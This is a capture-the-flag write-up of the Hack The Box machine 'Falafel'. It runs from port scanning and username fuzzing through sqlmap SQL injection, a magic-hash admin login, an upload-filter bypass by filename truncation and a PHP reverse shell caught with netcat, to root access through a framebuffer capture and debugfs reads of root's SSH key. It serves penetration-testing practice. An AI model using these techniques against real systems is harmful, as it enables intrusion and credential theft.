HTB – Falafel

Today we are going to solve another CTF challenge “falafel” which is available online for those who want to increase their skill in penetration testing and black box testing. Falafel is a retired vulnerable lab presented by hack the box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to expert level.

Level: Hard

Task: find user.txt & root.txt file on the victim’s machine

Since these labs are online available therefore they have static IP and its IP is so let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV
Starting Nmap 7.70 ( ) at 2019-04-02 14:26 W. Europe Summer Time
Nmap scan report for
Host is up (0.030s latency).
Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 20.67 seconds

So we explored target IP through the web browser and it put up a login page shown.


With the information we got from robots.txt, let’s brute-force for some .txt files that might give some juicy information

root@kali:~# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404 -t 60
* Wfuzz 2.1.5 - The Web Bruteforcer                      *

Total requests: 207643

ID	Response   Lines      Word         Chars          Request    

01347:  C=200      1 L	       4 W	     30 Ch	  "robots"
06064:  C=200     17 L	     120 W	    804 Ch	  "cyberlaw"

Total time: 2430.657
Processed Requests: 207625
Filtered Requests: 207610
Requests/sec.: 85.41926

Let’s check cyberlaw.txt

By reading this message, I conclude that there is an admin account and which is facing major security issue and an attacker can easily take over the website using an image upload feature. Moreover, there is some hint on the URL filter.

Then we could also fuzz for other usernames

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --sc 200 -t 60 -d "username=FUZZ&password=PuckieStyle"

* Wfuzz 2.3.3 - The Web Fuzzer *

Total requests: 8607

ID Response Lines Word Chars Payload 

000003: C=200 102 L 657 W 7074 Ch "Aaron"
000004: C=200 102 L 657 W 7074 Ch "Aartjan"
000005: C=200 102 L 657 W 7074 Ch "Abagael"
000006: C=200 102 L 657 W 7074 Ch "Abagail"
000007: C=200 102 L 657 W 7074 Ch "Abahri"
Finishing pending requests...

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --hw 657 -t 60 -d "username=FUZZ&password=PuckieStyle"

* Wfuzz 2.3.3 - The Web Fuzzer                         *

Total requests: 8607

ID   Response   Lines      Word         Chars          Payload    

000065:  C=200    102 L	     659 W	   7091 Ch	  "Admin"
001488:  C=200    102 L	     659 W	   7091 Ch	  "Chris"

Total time: 37.51125
Processed Requests: 8607
Filtered Requests: 8605
Requests/sec.: 229.4511

The next thing that we can try is see if there is a SQL injection vulnerability. For test it, we can insert the following string as username:

and we press login button with random password. The web page answer is: Wrong identification: admin, Bbut we have not insert “admin” in login form → there is SQL injection!


Exploiting Web Application Vulnerabilities

Then we make more efforts for SQL injection by using SQLMAP and used “Wrong identification” as a string to be passed at the time of login.

c:\SQLMAP>python -u --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables --batch
___ ___[(]_____ ___ ___ {}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_|

[*] starting @ 14:59:45 /2019-04-02/

back-end DBMS: MySQL 5
[14:59:46] [INFO] fetching tables for database: 'falafel'
[14:59:46] [INFO] fetching number of tables for database 'falafel'
[14:59:46] [INFO] resumed: 1
[14:59:46] [INFO] resumed: users
Database: falafel
[1 table]
| users |

[*] ending @ 14:59:46 /2019-04-02/
c:\SQLMAP>python -u --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch
___ ___[']_____ ___ ___ {}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_|

[*] starting @ 15:01:18 /2019-04-02/

[15:01:18] [INFO] testing connection to the target URL
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: falafel
Table: users
[2 entries]
| ID | role | username | password |
| 1 | admin | admin | 0e462096931906507119562988736854 |
| 2 | normal | chris | d4ee02a22fc872e36d9e3751ba72ddc8 |

[*] ending @ 15:01:19 /2019-04-02/

As you can observe that the password hash for user admin is started with 0 and I don’t know much about this type of hash, so we look in the Google and notice link for Magic hashes.

As you can observe the highlighted md5 hash for the 32-bit string is same as above……………………….

With help of the following credential we login into admin dashboard and move to upload options.

Here we are trying to upload a php file named shell.php but it put an error “Bad extension “as shown

Thereafter we renamed it as shell.php.png and again try to upload.

Ohh! Yes, the file with .png extension get uploaded successfully inside /var/www/html/uploads hence we can to upload a malicious php file or any php backdoor with .png extension.

Spawning Shell

Let’s create a PHP payload for uploading into the web site.

As shown in the given image the PHP file is uploaded successfully inside /var/www/html/uploads.


Trying filenames with very long names, I noticed the web app truncates the filename saved on the disk to a maximum of 236 characters.With this logic we can create a file with a 240 chars filename with the last 8 characters set to “.php.png”. Due to the behavior of the web app, it will truncate the last four characters “.png” which will leave us with a file having a “.php” file extension.

Sample filename:


Let’s prepare a php reverse shell with a loooong,loooong file name and host it using python SimpleHTTPServer

Root@kali:~/htb/falafel# python -m SimpleHTTPServer 80
Serving HTTP on port 80 ... - - [02/Apr/2019 10:10:20] "GET /verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png HTTP/1.1" 200 -

Triggering the reverse shell via curl:

root@kali:~/htb/falafel# curl ""

Netcat listener receiving the reverse shell connection:

root@kali:~/htb/falafel# nc -lvp 443
Ncat: Version 7.70 ( )
Ncat: Listening on :::443
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
17:14:07 up 1 day, 16:59, 2 users, load average: 0.00, 0.00, 0.00
yossi tty1 Mon00 40:59m 0.15s 0.09s -bash
moshe pts/0 15:21 1:52m 0.00s 0.00s -sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')" 

We open passwd file and notice two system username i.e. yossi and moshe.

www-data@falafel:/$ cd /var/www/html
cd /var/www/html
www-data@falafel:/var/www/html$ ls
assets cyberlaw.txt images login_logic.php style.php
authorized.php footer.php index.php logout.php upload.php
connection.php header.php js profile.php uploads
css icon.png login.php robots.txt
www-data@falafel:/var/www/html$ cat connection.php 
cat connection.php
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
// Check connection
if (mysqli_connect_errno())
echo "Failed to connect to MySQL: " . mysqli_connect_error();

This is MySQL configuration file for MySQL where username is moshe and password is falafelIsReallyTasty

With help of above credential we are trying to ssh login and after making successful login we found the user.txt file from inside /home/moshe

PS C:\Users\jacco> ssh moshe@
moshe@'s password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

* Documentation:
* Management:
* Support:

0 packages can be updated.
0 updates are security updates.

Last login: Tue Apr 2 15:21:50 2019 from
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
setterm: terminal xterm-256color does not support --blank
moshe@falafel:~$ ls
moshe@falafel:~$ cat user.txt

After some more penetration, we enumerated the groups for user moshe and found that the user is in the video group. When we found uses as the member of the video group then for Privilege Escalation we need check frame-buffer device. Because this can lead a local user able to access a frame buffer device file (/dev/fb*) could possibly use this flaw to escalate their privileges on the system.

Let’s have the contents of /dev/fb0 with help of cat command to capture the framebuffer raw data inside /tmp directory as scree.raw

So we have captured the raw data inside /tmp, now you need to take the raw image and convert it to a standard image format say .png but we before that we need to find t the size, use the following command which will print the dimension……………..

Now enter the following command to convert raw data into a .png image format

Then we opened screen.png and got the following image which was showing password: MoshePlzStopHackingMe!for user Yossi.

With help of above-enumerated credential, we have made SSH login successfully and then run following command for getting SSH RSA key.

PS C:\Users\jacco> ssh yossi@
yossi@'s password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:
 * Management:
 * Support:

0 packages can be updated.
0 updates are security updates.

Last login: Tue Apr  2 15:16:20 2019 from
yossi@falafel:~$ groups
yossi adm disk cdrom dip plugdev lpadmin sambashare
yossi@falafel:~$ debugfs /dev/sda1
debugfs 1.42.13 (17-May-2015)
debugfs:  cat /root/.ssh/id_rsa
debugfs:  cat /root/root.txt
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *